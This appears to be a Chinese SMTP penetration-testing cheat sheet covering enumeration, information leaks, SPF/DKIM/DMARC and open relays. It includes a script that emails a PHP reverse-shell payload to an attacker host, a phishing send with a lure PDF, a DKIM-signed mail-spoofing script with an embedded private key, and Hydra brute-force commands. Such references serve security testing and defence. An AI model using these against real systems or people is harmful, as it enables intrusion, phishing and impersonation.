25,465,587 - SMTPs渗透测试

基本信息

SMTP（简单邮件传输协议）*是一种用于*发送和接收电子邮件的 TCP/IP 协议。但是，由于它在接收端对消息进行排队的能力有限，因此它通常与其他两种协议之一（POP3 或 IMAP）一起使用，使用户可以将消息保存在服务器邮箱中并定期从服务器下载它们。

换句话说，用户通常使用使用SMTP 发送电子邮件并使用POP3 或 IMAP 接收电子邮件的程序。在基于 Unix 的系统上，sendmail是使用最广泛的电子邮件 SMTP 服务器。商业软件包 Sendmail 包括一个 POP3 服务器。Microsoft Exchange包括一个 SMTP 服务器，也可以设置为包括 POP3 支持。从这里开始。

默认端口: 25,465(ssl),587(ssl)

PORT   STATE SERVICE REASON  VERSION
25/tcp open  smtp    syn-ack Microsoft ESMTP 6.0.3790.3959

EMAIL Headers

如果你有机会让受害者给你发一封电子邮件（例如通过网页的联系方式），那么这样做是因为你可以通过查看邮件标题了解受害者的内部拓扑结构。

您还可以从 SMTP 服务器获取一封电子邮件，试图向该服务器发送一封电子邮件到一个不存在的地址（因为服务器将向攻击者发送一封 NDN 邮件）。但是，请确保您从允许的地址发送电子邮件（检查 SPF 策略）并且您可以接收 NDN 消息。

您还应该尝试发送不同的内容，因为您可以在标题上找到更多有趣的信息，例如： 您应该发送 EICAR 测试文件。检测AV可能允许您利用已知漏洞。 X-Virus-Scanned:byav.domain.com

基本动作

Banner 抓取/基本连接

SMTP:

nc -vn <IP> 25

SMTPS:

openssl s_client -crlf -connect smtp.mailgun.org:465 #没有starttls命令的SSL/TLS
openssl s_client -starttls smtp -crlf -connect smtp.mailgun.org:587

查找组织的 MX 服务器

dig +short mx google.com

枚举

nmap -p25 --script smtp-commands 10.10.10.10
nmap -p25 --script smtp-open-relay 10.10.10.10 -v

NTLM Auth - 信息泄露

如果服务器支持 NTLM 身份验证 (Windows)，您可以获得敏感信息（版本）。更多信息在这里。

root@kali: telnet example.com 587 
220 example.com SMTP Server Banner 
>> HELO
250 example.com Hello [x.x.x.x] 
>> AUTH NTLM 334 
NTLM supported
>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= 
334 TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA

或者使用nmap插件自动执行此操作 smtp-ntlm-info.nse

内部服务器名称 - 信息泄露

当发出没有完整地址的命令“MAIL FROM”时，某些 SMTP 服务器会自动完成发件人的地址，从而泄露其内部名称：

220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at  Wed, 15 Sep 2021 12:13:28 +0200 
EHLO all
250-somedomain.com Hello [x.x.x.x]
250-TURN
250-SIZE 52428800
250-ETRN
250-PIPELINING
250-DSN
250-ENHANCEDSTATUSCODES
250-8bitmime
250-BINARYMIME
250-CHUNKING
250-VRFY
250 OK
MAIL FROM: me
250 2.1.0 me@PRODSERV01.somedomain.com....Sender OK

嗅探

检查你是否从数据包中嗅探了一些密码到端口 25

用户名暴力枚举

并不总是需要身份验证

收件人

$ telnet 10.0.10.1 25
Trying 10.0.10.1...
Connected to 10.0.10.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO x
250 myhost Hello [10.0.0.99], pleased to meet you
MAIL FROM:test@test.org
250 2.1.0 test@test.org... Sender ok
RCPT TO:test
550 5.1.1 test... User unknown
RCPT TO:admin
550 5.1.1 admin... User unknown
RCPT TO:ed
250 2.1.5 ed... Recipient ok

VRFY

$ telnet 10.0.0.1 25
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello [10.0.0.99], pleased to meet you
VRFY root
250 Super-User <root@myhost>
VRFY blah
550 blah... User unknown

EXPN

$ telnet 10.0.10.1 25
Trying 10.0.10.1...
Connected to 10.0.10.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
EXPN test
550 5.1.1 test... User unknown
EXPN root
250 2.1.5 <ed.williams@myhost>
EXPN sshd
250 2.1.5 sshd privsep <sshd@mail2>

摘自: https://research.nccgroup.com/2015/06/10/username-enumeration-techniques-and-their-value/

自动工具

Metasploit: auxiliary/scanner/smtp/smtp_enum
smtp-user-enum: smtp-user-enum -M <MODE> -u <USER> -t <IP>
Nmap: nmap --script smtp-enum-users <IP>

DSN 返回

投递状态通知报告：如果您向某个组织发送电子邮件至无效地址，该组织将通知该地址无效并向您发回邮件。返回电子邮件的标题将包含可能的敏感信息（例如与报告交互的邮件服务的 IP 地址或防病毒软件信息）。

[命令]

从 linux 控制台发送电子邮件

root@kali:~# sendEmail -t itdept@victim.com -f techsupport@bestcomputers.com -s 192.168.8.131 -u Important Upgrade Instructions -a /tmp/BestComputers-UpgradeInstructions.pdf
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
  - First line must be received within 60 seconds.
  - End manual input with a CTRL-D on its own line.
IT Dept,
We are sending this important file to all our customers. It contains very important instructions for upgrading and securing your software. Please read and let us know if you have any problems.
Sincerely,
 swaks --to $(cat emails | tr 'n' ',' | less) --from test@sneakymailer.htb --header "Subject: test" --body "please click here http://10.10.14.42/" --server 10.10.10.197

使用 Python 发送电子邮件

这是使用 python 脚本发送电子邮件的替代方法

from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import smtplib
import sys
lhost = "127.0.0.1"
lport = 443
rhost = "192.168.1.1"
rport = 25 # 489,587
# create message object instance
msg = MIMEMultipart()
# setup the parameters of the message
password = "" 
msg['From'] = "attacker@local"
msg['To'] = "victim@local"
msg['Subject'] = "This is not a drill!"
# payload
message = ("<?php system('bash -i >& /dev/tcp/%s/%d 0>&1'); ?>" % (lhost,lport))
print("[*] Payload is generated : %s" % message)
msg.attach(MIMEText(message, 'plain'))
server = smtplib.SMTP(host=rhost,port=rport)
if server.noop()[0] != 250:
    print("[-]Connection Error")
    exit()
server.starttls()
# Uncomment if log-in with authencation
# server.login(msg['From'], password)
server.sendmail(msg['From'], msg['To'], msg.as_string())
server.quit()
print("[***]successfully sent email to %s:" % (msg['To']))

邮件欺骗

本节的大部分内容摘自网络安全评估第 3 版一书。

SMTP 消息很容易被欺骗，因此组织使用SPF 、DKIM和DMARC功能来防止各方发送未经授权的电子邮件。

有关这些对策的完整指南，请访问https://seanthegeek.net/459/demystifying-dmarc/

SPF

发件人策略框架(SPF) 提供了一种机制，允许 MTA 检查发送电子邮件的主机是否经过授权。然后，组织可以定义授权邮件服务器列表，MTA 可以查询此列表以检查电子邮件是否被欺骗。为了定义 IP 地址/范围、域和其他允许代表域名发送电子邮件的人， SPF 注册表中出现了不同的“机制”。

机制

还可以识别指示匹配机制时应执行的操作的限定符。默认情况下，使用限定符 “+” （因此，如果任何机制匹配，则意味着它是允许的）。您通常会在每个 SPF 政策的末尾注明：~all或 -all 。这用于指示如果发件人不符合任何 SPF 策略，您应该将电子邮件标记为不受信任 (~) 或拒绝 (-) 电子邮件。

限定条件

每个机制都可以与四个限定符之一组合：

在下面的示例中，您可以阅读google.com 的 SPF 策略。请注意第一个 SPF 策略如何包含其他域的 SPF 策略：

kali@kali:~$ dig txt google.com | grep spf
google.com.             235     IN      TXT     "v=spf1 include:_spf.google.com ~all"
kali@kali:~$ dig txt _spf.google.com | grep spf
; <<>> DiG 9.11.3-1ubuntu1.7-Ubuntu <<>> txt _spf.google.com
;_spf.google.com.               IN      TXT
_spf.google.com.        235     IN      TXT     "v=spf1 include:_netblocks.google.com include:_netblocks2.google.com include:_netblocks3.google.com ~all"
kali@kali:~$ dig txt _netblocks.google.com | grep spf
_netblocks.google.com.  1606    IN      TXT     "v=spf1 ip4:35.190.247.0/24 ip4:64.233.160.0/19 ip4:66.102.0.0/20 ip4:66.249.80.0/20 ip4:72.14.192.0/18 ip4:74.125.0.0/16 ip4:108.177.8.0/21 ip4:173.194.0.0/16 ip4:209.85.128.0/17 ip4:216.58.192.0/19 ip4:216.239.32.0/19 ~all"
kali@kali:~$ dig txt _netblocks2.google.com | grep spf
_netblocks2.google.com. 1908    IN      TXT     "v=spf1 ip6:2001:4860:4000::/36 ip6:2404:6800:4000::/36 ip6:2607:f8b0:4000::/36 ip6:2800:3f0:4000::/36 ip6:2a00:1450:4000::/36 ip6:2c0f:fb50:4000::/36 ~all"
kali@kali:~$ dig txt _netblocks3.google.com | grep spf
_netblocks3.google.com. 1903    IN      TXT     "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all"

传统上，可以欺骗任何没有正确/任何 SPF 记录的域名。如今，如果电子邮件来自没有有效 SPF 记录的域，*可能会*自动被拒绝/标记为不受信任。

要检查域的 SPF，您可以使用在线工具，例如：https://www.kitterman.com/spf/validate.html

DKIM

DomainKeys Identified Mail (DKIM) 是一种机制，通过该机制，外国 MTA 在通过 DNS 检索域的公钥时对出站电子邮件进行签名和验证。DKIM 公钥保存在域的 TXT 记录中；但是，您必须知道选择器和域名才能检索它。

然后，要请求密钥，您需要域名和邮件标题中的邮件选择器， DKIM-Signature例如：d=gmail.com;s=20120113

dig 20120113._domainkey.gmail.com TXT | grep p=
20120113._domainkey.gmail.com. 280 IN   TXT    "k=rsa; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCg
KCAQEA1Kd87/UeJjenpabgbFwh+eBCsSTrqmwIYYvywlbhbqoo2DymndFkbjOVIPIldNs/m40KF+yzMn1skyoxcTUGCQs8g3

DMARC

基于域的消息身份验证、报告和一致性 (DMARC) 是一种在 SPF 和 DKIM 基础上扩展的邮件身份验证方法。策略指示邮件服务器如何处理给定域的电子邮件并报告执行的操作。

[

](https://github.com/carlospolop/hacktricks/blob/master/.gitbook/assets/image (134).png)

获取DMARC记录需要查询子域名_dmarc

root@kali:~# dig _dmarc.yahoo.com txt | grep DMARC
_dmarc.yahoo.com.  1785 IN TXT "v=DMARC1; p=reject; sp=none; pct=100;
rua=mailto:[email protected], mailto:[email protected];"
root@kali:~# dig _dmarc.google.com txt | grep DMARC
_dmarc.google.com. 600 IN TXT "v=DMARC1; p=quarantine; rua=mailto:[email protected]"
root@kali:~# dig _dmarc.paypal.com txt | grep DMARC
_dmarc.paypal.com. 300 IN TXT "v=DMARC1; p=reject; rua=mailto:[email protected];
ruf=mailto:[email protected],mailto:[email protected]"

PayPal 和 Yahoo 指示邮件服务器拒绝包含无效 DKIM 签名或并非来自其网络的邮件。然后将通知发送到每个组织内的相应电子邮件地址。谷歌以类似的方式配置，尽管它指示邮件服务器隔离邮件而不是完全拒绝它们。

DMARC 标签

子域呢？

从这里开始.您需要为您希望从中发送邮件的每个子域拥有单独的 SPF 记录。以下内容最初发布在 openspf.org 上，该网站曾经是此类内容的重要资源。

难搞的问题: 子域呢？如果我收到来自 pielovers.demon.co.uk 的邮件，并且没有 pielovers 的 SPF 数据，我是否应该返回一级并测试 demon.co.uk 的 SPF？不。Demon 的每个子域都是不同的客户，每个客户可能有自己的政策。默认情况下 Demon 的政策适用于所有客户是没有意义的；如果 Demon 想要这样做，它可以为每个子域设置 SPF 记录。因此，对 SPF 发布者的建议是：您应该为每个具有 A 或 MX 记录的子域或主机名添加 SPF 记录。具有通配符 A 或 MX 记录的站点还应具有通配符 SPF 记录，格式为：* IN TXT "v=spf1 -all"

这是有道理的——一个子域很可能位于不同的地理位置并且具有非常不同的 SPF 定义。

打开中继

为防止发送的邮件被垃圾邮件过滤器过滤而无法到达收件人，发件人可以使用收件人信任的中继服务器。通常，管理员没有概述他们必须允许哪些IP范围。这会导致我们在外部和内部渗透测试中仍然经常发现的 SMTP 服务器配置错误。因此，它们允许所有 IP 地址不会在电子邮件流量中造成错误，从而不会干扰或无意中中断与潜在和当前客户的通信：

mynetworks = 0.0.0.0/0
nmap -p25 --script smtp-open-relay 10.10.10.10 -v

工具

发送恶搞邮件

或者你可以使用这个工具：

# 这将从[email protected]发送测试电子邮件到[email protected]
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com
# 但你也可以修改邮件的更多选项
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com --subject TEST --sender administrator@victim.com

如果您在 dkim python 库中使用解析密钥时遇到任何错误，请随意使用以下一个。注意：这只是一个肮脏的修复，用于在由于某种原因 openssl 私钥无法被 dkim 解析的情况下进行快速检查。

-----BEGIN RSA PRIVATE KEY-----
MIICXgIBAAKBgQDdkohAIWT6mXiHpfAHF8bv2vHTDboN2dl5pZKG5ZSHCYC5Z1bt
spr6chlrPUX71hfSkk8WxnJ1iC9Moa9sRzdjBrxPMjRDgP8p8AFdpugP5rJJXExO
pkZcdNPvCXGYNYD86Gpous6ubn6KhUWwDD1bw2UFu53nW/AK/EE4/jeraQIDAQAB
AoGAe31lrsht7TWH9aJISsu3torCaKyn23xlNuVO6xwdUb28Hpk327bFpXveKuS1
koxaLqQYrEriFBtYsU8T5Dc06FQAVLpUBOn+9PcKlxPBCLvUF+/KbfHF0q1QbeZR
fgr+E+fPxwVPxxk3i1AwCP4Cp1+bz2s58wZXlDBkWZ2YJwECQQD/f4bO2lnJz9Mq
1xsL3PqHlzIKh+W+yiGmQAELbgOdX4uCxMxjs5lwGSACMH2nUwXx+05RB8EM2m+j
ZBTeqxDxAkEA3gHyUtVenuTGClgYpiwefaTbGfYadh0z2KmiVcRqWzz3hDUEWxhc
GNtFT8wzLcmRHB4SQYUaS0Df9mpvwvdB+QJBALGv9Qci39L0j/15P7wOYMWvpwOf
422+kYxXcuKKDkWCTzoQt7yXCRzmvFYJdznJCZdymNLNu7q+p2lQjxsUiWECQQCI
Ms2FP91ywYs1oWJN39c84byBKtiFCdla3Ib48y0EmFyJQTVQ5ZrqrOrSz8W+G2Do
zRIKHCxLapt7w0SZabORAkEAxvm5pd2MNVqrqMJHbukHY1yBqwm5zVIYr75eiIDP
K9B7U1w0CJFUk6+4Qutr2ROqKtNOff9KuNRLAOiAzH3ZbQ==
-----END RSA PRIVATE KEY-----

或者你可以手动完成：

php

# 这将发送未签名的消息
mail("[email protected]", "Test Subject!", "hey! This is a test", "From: [email protected]");

Python

# 来自 https://github.com/magichk/magicspoofing/blob/main/magicspoofmail.py
import os
import dkim #pip3 install dkimpy
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
# Set
destination="[email protected]"
sender="[email protected]"
subject="Test"
message_html="""
<html>
  <body>
    <h3>This is a test, not a scam</h3>
    <br />
  </body>
</html>
"""
sender_domain=sender.split("@")[1]
# Prep
os.system("sudo sed -ri 's/(myhostname) = (.*)/\1 = "+sender_domain+"/g' /etc/postfix/main.cf")
os.system("systemctl restart postfix")
# 生成 DKIM keys
dkim_private_key_path="dkimprivatekey.pem"
os.system(f"openssl genrsa -out {dkim_private_key_path} 1024 2> /dev/null")
with open(dkim_private_key_path) as fh:
    dkim_private_key = fh.read()
# 生成电子邮件
msg = MIMEMultipart("alternative")
msg.attach(MIMEText(message_html, "html"))
msg["To"] = destination
msg["From"] = sender
msg["Subject"] = subject
headers = [b"To", b"From", b"Subject"]
msg_data = msg.as_bytes()
# 使用dkim签署电子邮件
## 收件人将无法检查，但电子邮件将显示为已签名（因此更可信）
dkim_selector="s1"
sig = dkim.sign(message=msg_data,selector=str(dkim_selector).encode(),domain=sender_domain.encode(),privkey=dkim_private_key.encode(),include_headers=headers)
msg["DKIM-Signature"] = sig[len("DKIM-Signature: ") :].decode()
msg_data = msg.as_bytes()
# 使用本地后缀中继发送电子邮件
smtp="127.0.0.1"
s = smtplib.SMTP(smtp)
s.sendmail(sender, [destination], msg_data)

更多信息

在 https://seanthegeek.net/459/demystifying-dmarc/ 中查找有关这些保护的更多信息

通过 SMTP 渗透

如果您可以通过 SMTP 发送数据。

配置文件

后缀

通常，如果已安装，in /etc/postfix/master.cf包含在例如用户收到新邮件时执行的脚本。例如，该行 flags=Rquser=mark argv=/etc/postfix/filtering-f ${sender}--${recipient}表示 /etc/postfix/filtering如果用户标记收到新邮件，将执行该行。

其他配置文件：

sendmail.cf
submit.cf

自动化命令

Protocol_Name: SMTP    #协议缩写(如果有的话)。
Port_Number:  25,465,587     #如果有多个，则用逗号分隔。
Protocol_Description: Simple Mail Transfer Protocol          #协议缩写
Entry_1:
  Name: Notes
  Description: Notes for SMTP
  Note: |
    SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used in sending and receiving e-mail. However, since it is limited in its ability to queue messages at the receiving end, it is usually used with one of two other protocols, POP3 or IMAP, that let the user save messages in a server mailbox and download them periodically from the server.
Entry_2:
  Name: Banner Grab
  Description: Grab SMTP Banner
  Command: nc -vn {IP} 25
Entry_3:
  Name: SMTP Vuln Scan
  Description: SMTP Vuln Scan With Nmap
  Command: nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 {IP}
Entry_4:
  Name: SMTP User Enum
  Description: Enumerate uses with smtp-user-enum
  Command: smtp-user-enum -M VRFY -U {Big_Userlist} -t {IP}
Entry_5:
  Name: SMTPS Connect
  Description: Attempt to connect to SMTPS two different ways
  Command: openssl s_client -crlf -connect {IP}:465 &&&& openssl s_client -starttls smtp -crlf -connect {IP}:587
Entry_6:
  Name: Find MX Servers
  Description: Find MX servers of an organization
  Command: dig +short mx {Domain_Name}
Entry_7:
  Name: Hydra Brute Force
  Description: Need Nothing
  Command: hydra -P {Big_Passwordlist} {IP} smtp -V
Entry_8:
  Name: consolesless mfs enumeration
  Description: SMTP enumeration without the need to run msfconsole
  Note: sourced from https://github.com/carlospolop/legion
  Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_ntlm_domain; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_relay; set RHOSTS {IP}; set RPORT 25; run; exit'